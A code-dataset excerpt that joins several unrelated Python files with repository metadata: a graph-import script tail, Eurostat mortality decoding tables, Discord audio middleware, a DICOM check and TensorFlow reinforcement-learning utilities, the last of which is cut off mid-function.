                graph.merge(rel)
            else:
                relmatch["count_D" + str(depth)]=link['count']
                graph.push(relmatch)
            if j%100 == 0:
                print(".", end=" ")
            if j%1000 ==0:
                print(j ,"/",totnblinks)
            j=j+1
        # NOTE(review): bare except silently drops any link that fails.
        except:
            pass
    print(j," links imported")
    print(len(graph.relationships.match()), "links in db after import")
# This imports all gexf files (takes time)
# NOTE(review): machine-specific absolute Windows paths -- this script only
# runs as-is on the original author's machine.
pathD0IN = "C:\\Users\\Jo\\Documents\\Tech\\Atom_prj\\MyMedia-FillDB\\data\\HypheExport20200520\\202005Websites01_D0_IN.gexf"
importGexf(pathD0IN, 0)
pathD1IN = "C:\\Users\\Jo\\Documents\\Tech\\Atom_prj\\MyMedia-FillDB\\data\\HypheExport20200520\\202005Websites01_D1_IN.gexf"
importGexf(pathD1IN, 1)
# This has not been done entirely
pathD2IN = "C:\\Users\\Jo\\Documents\\Tech\\Atom_prj\\MyMedia-FillDB\\data\\HypheExport20200520\\202005_Websites01_D2_IN.gexf"
importGexf(pathD2IN, 2)
| 38.823129 | 126 | 0.58805 |
3a851eb1905fe0976754043eca815207cc550202 | 4,023 | py | Python | code_base/excess_mortality/decode_args.py | Mlad-en/COV-BG | dabc6875e49b1fdb113ed691fbf70d5bdcb1846c | [
"MIT"
] | null | null | null | code_base/excess_mortality/decode_args.py | Mlad-en/COV-BG | dabc6875e49b1fdb113ed691fbf70d5bdcb1846c | [
"MIT"
] | null | null | null | code_base/excess_mortality/decode_args.py | Mlad-en/COV-BG | dabc6875e49b1fdb113ed691fbf70d5bdcb1846c | [
"MIT"
] | null | null | null | from code_base.excess_mortality.decode_loc_vars import *
# Raw (pre-split) header column string of each Eurostat dataset.
DECODE_DEMO_COL = {
    'excess_mortality_by_sex_age_country': 'age,sex,unit,geo\\time',
    'excess_mortality_by_sex_age_nuts3': 'unit,sex,age,geo\\time',
    'europe_population_by_age_and_sex': 'freq;unit;sex;age;geo\TIME_PERIOD'
}
# Human-readable column names replacing the raw header, in the same order.
DECODE_DEMO_REPL = {
    'excess_mortality_by_sex_age_country': ['Age', 'Sex', 'Unit', 'Location'],
    'excess_mortality_by_sex_age_nuts3': ['Unit', 'Sex', 'Age', 'Location'],
    'europe_population_by_age_and_sex': ['Frequency', 'Unit', 'Sex', 'Age', 'Location']
}
# Field separator used by each dataset's combined header column.
DECODE_DEMO_SEPARATOR = {
    'excess_mortality_by_sex_age_country': ',',
    'excess_mortality_by_sex_age_nuts3': ',',
    'europe_population_by_age_and_sex': ';'
}
# Columns to keep after decoding, per dataset.
RETAIN_COLUMNS = {
    'excess_mortality_by_sex_age_country': ['Age', 'Sex', 'Location'],
    'excess_mortality_by_sex_age_nuts3': ['Age', 'Sex', 'Location'],
    'europe_population_by_age_and_sex': ['Age', 'Sex', 'Location', '2020']
}
# Location-code decoding map per dataset (maps come from decode_loc_vars).
COUNTRY_REPLACE = {
    'excess_mortality_by_sex_age_country': EU_COUNTRIES_ISO_2_DECODES,
    'excess_mortality_by_sex_age_nuts3': EU_DECODE_NUTS3_REGIONS,
    'europe_population_by_age_and_sex': EU_COUNTRIES_ISO_2_DECODES
}
# Output file extensions by format keyword.
FILE_EXT_TYPE = {
    'csv': '.csv',
    'excel': '.xlsx',
}
# Eurostat age-band codes -> canonical 5-year age-group labels.
EUROSTAT_AGES_CONVERSION = {
    'TOTAL': 'Total',
    'Y_LT5': '(0-4)',
    'Y5-9': '(5-9)',
    'Y10-14': '(10-14)',
    'Y15-19': '(15-19)',
    'Y20-24': '(20-24)',
    'Y25-29': '(25-29)',
    'Y30-34': '(30-34)',
    'Y35-39': '(35-39)',
    'Y40-44': '(40-44)',
    'Y45-49': '(45-49)',
    'Y50-54': '(50-54)',
    'Y55-59': '(55-59)',
    'Y60-64': '(60-64)',
    'Y65-69': '(65-69)',
    'Y70-74': '(70-74)',
    'Y75-79': '(75-79)',
    'Y80-84': '(80-84)',
    'Y85-89': '(85-89)',
    'Y_GE90': '(90+)',
}
# Eurostat sex codes -> canonical labels.
EUROSTAT_SEX_CONVERSION = {
    'F': 'Female',
    'M': 'Male',
    'T': 'Total',
}
# UN age-band labels -> canonical labels; bands above 90 collapse into (90+).
UN_DECODE_AGE_GROUPS = {
    'Total': 'Total',
    '0 - 4': '(0-4)',
    '5 - 9': '(5-9)',
    '10 - 14': '(10-14)',
    '15 - 19': '(15-19)',
    '20 - 24': '(20-24)',
    '25 - 29': '(25-29)',
    '30 - 34': '(30-34)',
    '35 - 39': '(35-39)',
    '40 - 44': '(40-44)',
    '45 - 49': '(45-49)',
    '50 - 54': '(50-54)',
    '55 - 59': '(55-59)',
    '60 - 64': '(60-64)',
    '65 - 69': '(65-69)',
    '70 - 74': '(70-74)',
    '75 - 79': '(75-79)',
    '80 - 84': '(80-84)',
    '85 - 89': '(85-89)',
    '90 - 94': '(90+)',
    '95 - 99': '(90+)',
    '100 +': '(90+)',
    '90 +': '(90+)',
}
# UN sex labels -> canonical labels.
UN_DECODE_SEX_GROUPS = {
    'Both Sexes': 'Total',
    'Male': 'Male',
    'Female': 'Female',
}
# Standard EU 2013 population age bands -> canonical labels.
std_eu_pop_2013_decode_age = {
    # Combine 0-4 by decoding under 1 and 1-4 as the same value
    'Under 1 year': '(0-4)',
    '1 year to under 5 years': '(0-4)',
    '5 to under 10 years': '(5-9)',
    '10 to under 15 years': '(10-14)',
    '15 to under 20 years': '(15-19)',
    '20 to under 25 years': '(20-24)',
    '25 to under 30 years': '(25-29)',
    '30 to under 35 years': '(30-34)',
    '35 to under 40 years': '(35-39)',
    '40 to under 45 years': '(40-44)',
    '45 to under 50 years': '(45-49)',
    '50 to under 55 years': '(50-54)',
    '55 to under 60 years': '(55-59)',
    '60 to under 65 years': '(60-64)',
    '65 to under 70 years': '(65-69)',
    '70 to under 75 years': '(70-74)',
    '75 to under 80 years': '(75-79)',
    '80 to under 85 years': '(80-84)',
    '85 to under 90 years': '(85-89)',
    '90 years and older': '(90+)',
}
# Infostat (BG) age bands -> canonical labels; 0 and 1-4 merge into (0-4),
# bands above 90 collapse into (90+).
INFOSTAT_DECODE_AGE_GROUPS = {
    'Total': 'Total',
    '0': '(0-4)',
    '1 - 4': '(0-4)',
    '5 - 9': '(5-9)',
    '10 - 14': '(10-14)',
    '15 - 19': '(15-19)',
    '20 - 24': '(20-24)',
    '25 - 29': '(25-29)',
    '30 - 34': '(30-34)',
    '35 - 39': '(35-39)',
    '40 - 44': '(40-44)',
    '45 - 49': '(45-49)',
    '50 - 54': '(50-54)',
    '55 - 59': '(55-59)',
    '60 - 64': '(60-64)',
    '65 - 69': '(65-69)',
    '70 - 74': '(70-74)',
    '75 - 79': '(75-79)',
    '80 - 84': '(80-84)',
    '85 - 89': '(85-89)',
    '90 - 94': '(90+)',
    '95 - 99': '(90+)',
    '100+': '(90+)',
}
| 27 | 87 | 0.505096 |
3a862072dc82d94cea5c675c09cf65fbf2cd377c | 4,510 | py | Python | concord/ext/audio/middleware.py | nariman/concord-ext-audio | c7662507f641bfdba277509838433dbb24fe11a3 | [
"MIT"
] | null | null | null | concord/ext/audio/middleware.py | nariman/concord-ext-audio | c7662507f641bfdba277509838433dbb24fe11a3 | [
"MIT"
] | 14 | 2019-02-19T03:14:07.000Z | 2021-06-25T15:15:55.000Z | concord/ext/audio/middleware.py | narimanized/concord-ext-audio | c7662507f641bfdba277509838433dbb24fe11a3 | [
"MIT"
] | null | null | null | """
The MIT License (MIT)
Copyright (c) 2017-2018 Nariman Safiulin
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import asyncio
from typing import Callable, Optional
import discord
from concord.context import Context
from concord.middleware import Middleware, MiddlewareState
from concord.ext.audio.state import State
class Join(Middleware):
    """Middleware for joining to the user's voice channel."""

    async def run(self, *_, ctx: Context, next: Callable, **kw): # noqa: D102
        # Bail out silently when the audio extension state is not attached.
        state = MiddlewareState.get_state(ctx, State)
        if state is None:
            return
        message = ctx.kwargs["message"]
        author = message.author
        channel = message.channel
        # Guild membership check: only discord.Member has voice state.
        if not isinstance(author, discord.Member):
            await channel.send("You're not a member of this guild.")
            return
        if not author.voice:
            await channel.send("You're not in a voice channel.")
            return
        #
        # Only guilds are allowed.
        voice_client = channel.guild.voice_client
        audio_state = state.get_audio_state(channel.guild)
        voice_channel = author.voice.channel
        # Three cases: not connected yet, connected elsewhere, already here.
        if voice_client is None:
            try:
                voice_client = await voice_channel.connect()
            except asyncio.TimeoutError:
                # NOTE(review): user-facing grammar left as-is on purpose;
                # a doc-only change must not alter runtime strings.
                await channel.send(
                    "Unfortunately, something wrong happened and I hasn't "
                    "joined your channel in a time."
                )
                return
            await channel.send("Connected.")
        elif voice_client.channel != voice_channel:
            await voice_client.move_to(voice_channel)
            await channel.send("Moved.")
        else:
            await channel.send("I'm already in your voice channel.")
        #
        # Remember the (possibly new) voice client on the audio state.
        audio_state.set_voice_client(voice_client)
class Leave(Middleware):
    """Middleware for leaving currently connected voice channel."""

    async def run(self, *_, ctx: Context, next: Callable, **kw): # noqa: D102
        message = ctx.kwargs["message"]
        author = message.author
        channel = message.channel
        # Guild membership check, matching Join's behavior.
        if not isinstance(author, discord.Member):
            await channel.send("You're not a member of this guild.")
            return
        #
        # Only guilds are allowed.
        voice_client = channel.guild.voice_client
        if voice_client is None:
            await message.channel.send("I'm not connected to voice channel.")
            return
        #
        # Voice client will be removed from audio state as well.
        await voice_client.disconnect(force=True)
        await message.channel.send("Disconnected.")
class Volume(Middleware):
    """Middleware for changing the master volume."""

    async def run(
        self,
        *_,
        ctx: Context,
        next: Callable,
        volume: Optional[str] = None,
        **kw,
    ): # noqa: D102
        # Bail out silently when the audio extension state is not attached.
        state = MiddlewareState.get_state(ctx, State)
        if state is None:
            return
        message = ctx.kwargs["message"]
        channel = message.channel
        # Only guilds are allowed.
        audio_state = state.get_audio_state(channel.guild)
        # With no argument this command just reports the current volume.
        if volume is not None:
            try:
                audio_state.master_volume = float(volume)
            except ValueError:
                await channel.send("Only float values are possible.")
                return
        #
        await channel.send(
            f"Master volume is set to {audio_state.master_volume}"
        )
| 34.166667 | 80 | 0.645455 |
3a862c1dfb4c8e4aff3392df9183017ab88ec2ab | 775 | py | Python | umtk/image/utils.py | kyle0x54/umtk | 883090d84fce924e65184847e6b3048014616f5d | [
"Apache-2.0"
] | 1 | 2020-08-03T12:27:02.000Z | 2020-08-03T12:27:02.000Z | umtk/image/utils.py | kyle0x54/umtk | 883090d84fce924e65184847e6b3048014616f5d | [
"Apache-2.0"
] | null | null | null | umtk/image/utils.py | kyle0x54/umtk | 883090d84fce924e65184847e6b3048014616f5d | [
"Apache-2.0"
] | 1 | 2020-11-28T03:27:10.000Z | 2020-11-28T03:27:10.000Z | import os
from pathlib import Path
from typing import Any, Dict, Union
import numpy as np
def isdicom(path: Union[str, Path]) -> bool:
    """Judge whether a given file is a valid dicom.

    A DICOM Part-10 file starts with a 128-byte preamble followed by the
    4-byte magic code ``DICM``.

    Args:
        path: given file path.

    Returns:
        True if given path is a valid dicom, otherwise False.
    """
    if not os.path.isfile(path):
        return False
    # read preamble and magic code in a single call
    with open(path, "rb") as f:
        header = f.read(132)
    # Files shorter than 132 bytes cannot carry the magic code at offset 128.
    return len(header) == 132 and header[128:132] == b"DICM"
def get_reorient_image(vtd: Dict[str, Any]) -> np.ndarray:
    """Return ``vtd["image_zyx"]`` flipped along every axis whose direction is negative."""
    flip_axes = np.where(vtd["direction_zyx"] < 0)[0]
    return np.flip(vtd["image_zyx"], flip_axes)
3a866ce737d90dd7710156bcd56f1d122772201c | 28,704 | py | Python | tf_rl/common/utils.py | Rowing0914/TF_RL | 68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7 | [
"MIT"
] | 23 | 2019-04-04T17:34:56.000Z | 2021-12-14T19:34:10.000Z | tf_rl/common/utils.py | Rowing0914/TF_RL | 68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7 | [
"MIT"
] | null | null | null | tf_rl/common/utils.py | Rowing0914/TF_RL | 68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7 | [
"MIT"
] | 3 | 2019-07-17T23:56:36.000Z | 2022-03-13T03:55:21.000Z | import tensorflow as tf
import numpy as np
import os, datetime, itertools, shutil, gym, sys
from tf_rl.common.visualise import plot_Q_values
from tf_rl.common.wrappers import MyWrapper, CartPole_Pixel, wrap_deepmind, make_atari
"""
TF basic Utility functions
"""
def eager_setup():
    """
    Enable eager execution in tensorflow with a config that allows us to
    flexibly access a GPU from multiple python scripts.
    :return:
    """
    # Soft placement falls back to CPU when a requested device is missing;
    # single-threaded op parallelism keeps resource usage predictable.
    config = tf.compat.v1.ConfigProto(allow_soft_placement=True,
                                      intra_op_parallelism_threads=1,
                                      inter_op_parallelism_threads=1)
    # Grow GPU memory on demand instead of grabbing it all up front, so
    # several scripts can share one GPU.
    config.gpu_options.allow_growth = True
    tf.compat.v1.enable_eager_execution(config=config)
    tf.compat.v1.enable_resource_variables()
"""
Common Utility functions
"""
def get_alg_name():
    """Returns the name of the algorithm.

    We assume that the directory architecture for that algo looks like below
    - Atari: `examples/algo_name/algo_name_eager.py`
    - Cartpole: `examples/algo_name/algo_name_eager_cartpole.py`
    * where algo_name must be uppercase/capital letters!!

    The name is derived from the running script (``sys.argv[0]``): file name,
    minus everything after the first dot, minus the ``_eager`` marker.
    """
    # os.path.basename also copes with Windows separators, unlike the
    # previous rsplit("/") approach.
    script_name = os.path.basename(sys.argv[0])
    # split(".")[0] keeps everything before the first dot, matching the
    # original rsplit(".")[0] behaviour.
    alg_name = script_name.split(".")[0].replace("_eager", "")
    return alg_name
def invoke_agent_env(params, alg):
    """Returns the wrapped env and string name of agent, then Use `eval(agent)` to activate it from main script

    :param params: run configuration (needs mode, env_name, skip_frame_k, debug_flg)
    :param alg: algorithm name string
    :raises ValueError: for an unknown ``params.mode`` (previously this fell
        through and crashed with a NameError on the undefined ``env``)
    """
    if params.mode == "Atari":
        # BUGFIX: skip_frame_k used to also be passed to str.format, where it
        # was silently ignored. NOTE(review): it may have been meant for
        # make_atari as well — confirm against make_atari's signature.
        env = wrap_deepmind(make_atari("{}NoFrameskip-v4".format(params.env_name)),
                            skip_frame_k=params.skip_frame_k)
        if params.debug_flg:
            agent = "{}_debug".format(alg)
        else:
            agent = "{}".format(alg)
    else:
        agent = "{}".format(alg)
        if params.mode == "CartPole":
            env = MyWrapper(gym.make("CartPole-v0"))
        elif params.mode == "CartPole-p":
            env = CartPole_Pixel(gym.make("CartPole-v0"))
        else:
            raise ValueError("Unknown mode: {}".format(params.mode))
    return agent, env
def create_log_model_directory(params, alg):
    """
    Create a directory for log/model
    this is compatible with Google colab and can connect to MyDrive through the authorisation step

    Local layout: ../../logs/{logs,models}/<timestamp>-<alg>_<name>[_debug]/

    :param params: run configuration; MUTATED in place (log_dir/model_dir and,
        on colab, log_dir_colab/model_dir_colab are set on it)
    :param alg: algorithm name used in the directory name
    :return: the same ``params`` object
    """
    # Atari/MuJoCo runs are distinguished by env name, other modes by mode name.
    if params.mode in ["Atari", "atari", "MuJoCo", "mujoco"]:
        second_name = params.env_name
    else:
        second_name = params.mode
    now = datetime.datetime.now()
    if params.google_colab:
        # mount the MyDrive on google drive and create the log directory for saving model and logging using tensorboard
        params.log_dir, params.model_dir, params.log_dir_colab, params.model_dir_colab = _setup_on_colab(alg,
                                                                                                         params.mode)
    else:
        if params.debug_flg:
            params.log_dir = "../../logs/logs/" + now.strftime("%Y%m%d-%H%M%S") + "-{}_{}_debug/".format(alg,
                                                                                                          second_name)
            params.model_dir = "../../logs/models/" + now.strftime("%Y%m%d-%H%M%S") + "-{}_{}_debug/".format(alg,
                                                                                                              second_name)
        else:
            params.log_dir = "../../logs/logs/" + now.strftime("%Y%m%d-%H%M%S") + "-{}_{}/".format(alg, second_name)
            params.model_dir = "../../logs/models/" + now.strftime("%Y%m%d-%H%M%S") + "-{}_{}/".format(alg, second_name)
    return params
def create_loss_func(loss_name="mse"):
    """Return a TF v1 loss callable selected by name.

    :param loss_name: either "huber" or "mse"
    :return: the corresponding ``tf.compat.v1.losses`` callable
    :raises ValueError: for any other name (previously an ``assert``, which
        disappears under ``python -O``)
    """
    if loss_name == "huber":
        loss_fn = tf.compat.v1.losses.huber_loss
    elif loss_name == "mse":
        loss_fn = tf.compat.v1.losses.mean_squared_error
    else:
        raise ValueError("Choose the loss_fn from either huber or mse")
    return loss_fn
def get_ready(params):
    """Dump every attribute of ``params`` to stdout, one ``name : value`` per line."""
    for name, value in vars(params).items():
        print(name, " : ", value)
def create_checkpoint(model, optimizer, model_dir):
    """
    Create a checkpoint for managing a model, restoring previous training
    progress from ``model_dir`` when it exists.

    :param model: model to checkpoint
    :param optimizer: optimizer to checkpoint
    :param model_dir: directory holding the checkpoints
    :return: a tf.train.CheckpointManager keeping the 3 newest checkpoints
    """
    checkpoint_dir = model_dir
    check_point = tf.train.Checkpoint(optimizer=optimizer,
                                      model=model,
                                      optimizer_step=tf.compat.v1.train.get_or_create_global_step())
    manager = tf.train.CheckpointManager(check_point, checkpoint_dir, max_to_keep=3)
    # try re-loading the previous training progress!
    try:
        print("Try loading the previous training progress")
        check_point.restore(manager.latest_checkpoint)
        # A fresh model has global step 0: treat that as "nothing restored"
        # and fall through to the except branch below.
        assert tf.compat.v1.train.get_global_step().numpy() != 0
        print("===================================================\n")
        print("Restored the model from {}".format(checkpoint_dir))
        print("Currently we are on time-step: {}".format(tf.compat.v1.train.get_global_step().numpy()))
        print("\n===================================================")
    except Exception:
        # BUGFIX: was a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit.
        print("===================================================\n")
        print("Previous Training files are not found in Directory: {}".format(checkpoint_dir))
        print("\n===================================================")
    return manager
def _setup_on_colab(alg_name, env_name):
    """
    Mount MyDrive to current instance through authentication of Google account
    Then use it as a backup of training related files

    :param alg_name: algorithm name, embedded in all directory paths
    :param env_name: environment (or mode) name, embedded in all directory paths
    :return: (log_dir, model_dir, log_dir_colab, model_dir_colab)
    """
    # mount your drive on google colab
    from google.colab import drive
    drive.mount("/content/gdrive")
    # Local (instance) directories and their Drive-backed counterparts.
    log_dir = "/content/TF_RL/logs/logs/{}/{}".format(alg_name, env_name)
    model_dir = "/content/TF_RL/logs/models/{}/{}".format(alg_name, env_name)
    log_dir_colab = "/content/gdrive/My Drive/logs/logs/{}/{}".format(alg_name, env_name)
    model_dir_colab = "/content/gdrive/My Drive/logs/models/{}/{}".format(alg_name, env_name)
    # create the logs directory under the root dir
    if not os.path.isdir(log_dir):
        os.makedirs(log_dir)
    if not os.path.isdir(model_dir):
        os.makedirs(model_dir)
    # if the previous directory existed in My Drive, then we would continue training on top of the previous training
    if os.path.isdir(log_dir_colab):
        print("=== {} IS FOUND ===".format(log_dir_colab))
        # restore previous logs from Drive into this instance
        copy_dir(log_dir_colab, log_dir, verbose=True)
    else:
        print("=== {} IS NOT FOUND ===".format(log_dir_colab))
        os.makedirs(log_dir_colab)
        print("=== FINISHED CREATING THE DIRECTORY ===")
    if os.path.isdir(model_dir_colab):
        print("=== {} IS FOUND ===".format(model_dir_colab))
        # restore previously saved models from Drive into this instance
        copy_dir(model_dir_colab, model_dir, verbose=True)
    else:
        print("=== {} IS NOT FOUND ===".format(model_dir_colab))
        os.makedirs(model_dir_colab)
        print("=== FINISHED CREATING THE DIRECTORY ===")
    return log_dir, model_dir, log_dir_colab, model_dir_colab
class AnnealingSchedule:
    """
    Scheduling the gradually decreasing value, e.g., epsilon or beta params
    """

    def __init__(self, start=1.0, end=0.1, decay_steps=500, decay_type="linear"):
        # start/end: first and final annealed values
        # decay_steps: number of steps over which the value decays
        # decay_type: "linear" (pre-computed table) or "curved" (exponential)
        self.start = start
        self.end = end
        self.decay_steps = decay_steps
        # Pre-computed linear interpolation table of length decay_steps.
        self.annealed_value = np.linspace(start, end, decay_steps)
        self.decay_type = decay_type

    def old_get_value(self, timestep):
        """
        Deprecated — use get_value(), which reads the TF global step itself.
        :param timestep: current step; apparently expected to start at 1
            (NOTE(review): timestep=0 indexes -1, i.e. returns `end` — confirm callers)
        :return: annealed value for `timestep`
        """
        if self.decay_type == "linear":
            return self.annealed_value[min(timestep, self.decay_steps) - 1]
        # don't use this!!
        elif self.decay_type == "curved":
            if timestep < self.decay_steps:
                return self.start * 0.9 ** (timestep / self.decay_steps)
            else:
                return self.end

    def get_value(self):
        """Return the annealed value for the current TF global step."""
        timestep = tf.train.get_or_create_global_step()  # we are maintaining the global-step in train.py so it is accessible
        if self.decay_type == "linear":
            return self.annealed_value[min(timestep.numpy(), self.decay_steps) - 1]
        # don't use this!!
        elif self.decay_type == "curved":
            if timestep.numpy() < self.decay_steps:
                return self.start * 0.9 ** (timestep.numpy() / self.decay_steps)
            else:
                return self.end
def copy_dir(src, dst, symlinks=False, ignore=None, verbose=False):
    """
    copy the all contents in `src` directory to `dst` directory

    Usage:
        ```python
        copy_dir("./aa/", "./bb/")
        ```

    :param src: source directory
    :param dst: destination directory (must already exist)
    :param symlinks: passed through to shutil.copytree for sub-directories
    :param ignore: passed through to shutil.copytree for sub-directories
    :param verbose: print every copied path
    """
    # BUGFIX: the docstring previously showed the delete_files() example
    # (the two usage snippets were swapped).
    for item in os.listdir(src):
        s = os.path.join(src, item)
        d = os.path.join(dst, item)
        if verbose:
            print("From:{}, To: {}".format(s, d))
        # Directories are copied recursively, files individually (with metadata).
        if os.path.isdir(s):
            shutil.copytree(s, d, symlinks, ignore)
        else:
            shutil.copy2(s, d)
def delete_files(folder, verbose=False):
    """
    delete the all files in `folder` directory (sub-directories are kept)

    Usage:
        ```python
        delete_files("./bb/")
        ```
    """
    # BUGFIX: the docstring previously showed the copy_dir() example
    # (the two usage snippets were swapped).
    for the_file in os.listdir(folder):
        file_path = os.path.join(folder, the_file)
        try:
            if os.path.isfile(file_path):
                os.unlink(file_path)
                if verbose:
                    print("{} has been deleted".format(file_path))
        except Exception as e:
            # Best-effort: report the failure and keep deleting the rest.
            print(e)
class RunningMeanStd:
    """
    Running Mean and Standard Deviation for normalising the observation!
    This is mainly used in MuJoCo experiments, e.g. DDPG!

    Formula:
        - Normalisation: y = (x-mean)/std
    """

    def __init__(self, shape, clip_range=5, epsilon=1e-2):
        # shape: dimensionality of one sample
        # clip_range: normalised values are clipped into [-clip_range, clip_range]
        # epsilon: lower bound keeping std strictly positive
        self.size = shape
        self.epsilon = epsilon
        self.clip_range = clip_range
        self._sum = 0.0
        self._sumsq = np.ones(self.size, np.float32) * epsilon
        self._count = np.ones(self.size, np.float32) * epsilon
        self.mean = self._sum / self._count
        self.std = np.sqrt(np.maximum(self._sumsq / self._count - np.square(self.mean), np.square(self.epsilon)))

    def update(self, x):
        """
        update the mean and std by given input

        NOTE(review): despite the "running" name, this OVERWRITES the stored
        statistics with those of the latest batch (`=`, not `+=`) — confirm
        whether accumulation across calls was intended.

        :param x: can be observation, reward, or action!!
        :return:
        """
        x = x.reshape(-1, self.size)
        self._sum = x.sum(axis=0)
        self._sumsq = np.square(x).sum(axis=0)
        self._count = np.array([len(x)], dtype='float64')
        self.mean = self._sum / self._count
        # Variance is floored at epsilon^2 so std never collapses to 0.
        self.std = np.sqrt(np.maximum(self._sumsq / self._count - np.square(self.mean), np.square(self.epsilon)))

    def normalise(self, x):
        """
        Normalise `x` with the currently stored mean/std and clip the result.

        NOTE(review): contrary to the original docstring, this does NOT
        update the statistics — call update() separately.

        :param x:
        :return:
        """
        result = np.clip((x - self.mean) / self.std, -self.clip_range, self.clip_range)
        return result
def test(sess, agent, env, params):
    """
    Greedy evaluation loop for a TF1 (session-based) DQN-style agent, with
    env rendering and a live plot of the Q-values.

    :param sess: tf.Session used to evaluate agent.pred
    :param agent: agent exposing `pred`, `state` placeholder and `num_action`
    :param env: gym-style environment
    :param params: needs `test_episodes` and `state_reshape`
    """
    xmax = agent.num_action
    ymax = 3  # fixed y-axis limit of the Q-value plot
    print("\n ===== TEST STARTS: {0} Episodes ===== \n".format(params.test_episodes))
    for i in range(params.test_episodes):
        state = env.reset()
        for t in itertools.count():
            env.render()
            q_values = sess.run(agent.pred, feed_dict={agent.state: state.reshape(params.state_reshape)})[0]
            action = np.argmax(q_values)  # greedy action
            plot_Q_values(q_values, xmax=xmax, ymax=ymax)
            obs, reward, done, _ = env.step(action)
            state = obs
            if done:
                print("Episode finished after {} timesteps".format(t + 1))
                break
    return
class logger:
    """Console progress logger: throughput, ETA and reward statistics."""

    def __init__(self, params):
        # params: needs `num_frames` (total steps) and `reward_buffer_ep`
        self.params = params
        self.prev_update_step = 0  # global step at which we last logged

    def logging(self, time_step, current_episode, exec_time, reward_buffer, loss, epsilon, cnt_action):
        """
        Logging function

        :param time_step: current global step
        :param current_episode: current episode index
        :param exec_time: wall-clock seconds since the previous log call
        :param reward_buffer: recent episode rewards (iterable)
        :param loss: loss of the last episode
        :param epsilon: current exploration rate
        :param cnt_action: actions taken since the last log call
        :return:
        """
        # Histogram of actions taken since the previous log line.
        cnt_actions = dict((x, cnt_action.count(x)) for x in set(cnt_action))
        episode_steps = time_step - self.prev_update_step
        # remaing_time_step/exec_time_for_one_step
        remaining_time = str(datetime.timedelta(
            seconds=(self.params.num_frames - time_step) * exec_time / (episode_steps)))
        print(
            "{0}/{1}: Ep: {2}({3:.1f} fps), Remaining: {4}, (R) {5} Ep => [MEAN: {6:.3f}, MAX: {7:.3f}], (last ep) Loss: {8:.3f}, Eps: {9:.3f}, Act: {10}".format(
                time_step, self.params.num_frames, current_episode, episode_steps / exec_time, remaining_time,
                self.params.reward_buffer_ep, np.mean(reward_buffer), np.max(reward_buffer), loss,
                epsilon, cnt_actions
            ))
        self.prev_update_step = time_step
"""
Algorithm Specific Utility functions
"""
class her_sampler:
    """Hindsight Experience Replay (HER) transition sampler ("future" strategy)."""
    # borrow from: https://github.com/TianhongDai/hindsight-experience-replay/blob/master/her.py

    def __init__(self, replay_strategy, replay_k, reward_func=None):
        # replay_strategy: "future" enables HER relabelling, anything else disables it
        # replay_k: ratio of HER to regular transitions -> future_p = 1 - 1/(1+k)
        # reward_func: env reward function used to recompute rewards for relabelled goals
        self.replay_strategy = replay_strategy
        self.replay_k = replay_k
        if self.replay_strategy == 'future':
            self.future_p = 1 - (1. / (1 + replay_k))
        else:
            self.future_p = 0
        self.reward_func = reward_func

    def sample_her_transitions(self, episode_batch, batch_size_in_transitions):
        """
        Sample a minibatch, relabelling ~future_p of the goals with achieved
        goals taken from later timesteps of the same episode.

        :param episode_batch: dict of arrays shaped (num_episodes, T, ...),
            needs at least 'actions', 'ag', 'ag_next' and 'g'
        :param batch_size_in_transitions: number of transitions to sample
        :return: dict of arrays shaped (batch_size, ...), incl. recomputed 'r'
        """
        T = episode_batch['actions'].shape[1]
        rollout_batch_size = episode_batch['actions'].shape[0]
        batch_size = batch_size_in_transitions
        # select which rollouts and which timesteps to be used
        episode_idxs = np.random.randint(0, rollout_batch_size, batch_size)
        t_samples = np.random.randint(T, size=batch_size)
        transitions = {key: episode_batch[key][episode_idxs, t_samples].copy() for key in episode_batch.keys()}
        # her idx: the subset of the batch whose goal gets replaced
        her_indexes = np.where(np.random.uniform(size=batch_size) < self.future_p)
        # random future timestep, strictly after t_samples, in the same episode
        future_offset = np.random.uniform(size=batch_size) * (T - t_samples)
        future_offset = future_offset.astype(int)
        future_t = (t_samples + 1 + future_offset)[her_indexes]
        # replace go with achieved goal
        future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
        transitions['g'][her_indexes] = future_ag
        # to get the params to re-compute reward
        transitions['r'] = np.expand_dims(self.reward_func(transitions['ag_next'], transitions['g'], None), 1)
        transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:]) for k in transitions.keys()}
        return transitions
def action_postprocessing(action, params):
action += params.noise_eps * params.max_action * np.random.randn(*action.shape)
action = np.clip(action, -params.max_action, params.max_action)
# random actions...
random_actions = np.random.uniform(low=-params.max_action,
high=params.max_action,
size=params.num_action)
# choose if use the random actions
action += np.random.binomial(1, params.random_eps, 1)[0] * (random_actions - action)
return action
def state_unpacker(state):
    """
    Unpack a goal-env observation dict into numpy arrays.

    The input has keys 'observation', 'achieved_goal' and 'desired_goal'
    (standard gym goal-env format).

    :param state: observation dict from the environment
    :return: (observation, achieved_goal, desired_goal, remaining_goal) where
        remaining_goal = desired_goal - achieved_goal, i.e. how far we still
        are from the desired position
    """
    observation = np.array(state["observation"])
    reached = np.array(state["achieved_goal"])
    target = np.array(state["desired_goal"])
    to_go = simple_goal_subtract(target, reached)
    return observation, reached, target, to_go
def simple_goal_subtract(goal, achieved_goal):
    """
    We subtract the achieved goal from the desired one to see how much we are still far from the desired position
    """
    assert goal.shape == achieved_goal.shape
    return np.subtract(goal, achieved_goal)
ALIVE_BONUS = 1.0  # per-step survival bonus baked into some MuJoCo rewards


def get_distance(env_name):
